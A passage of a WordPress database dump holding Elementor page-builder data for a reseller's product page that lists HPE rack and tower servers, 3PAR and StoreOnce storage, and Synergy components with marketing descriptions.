]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8621,3657,'_cover',''),(8622,3657,'_show_excerpt',''),(8416,3635,'_wp_page_template','template-fullwidth.php'),(8417,3635,'_elementor_edit_mode','builder'),(8418,3635,'_elementor_template_type','post'),(8419,3635,'_elementor_version','2.5.14'),(8420,3635,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23469e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7ff144f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"b99977c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ba1eaa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"736e3d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"bf473fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba9d094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f64c755\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e4020c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4e09160\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf4a7d2\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"34c9825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c6c2e78\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"611dff3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"bbf6243\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"65d7d46\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f5ccf11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",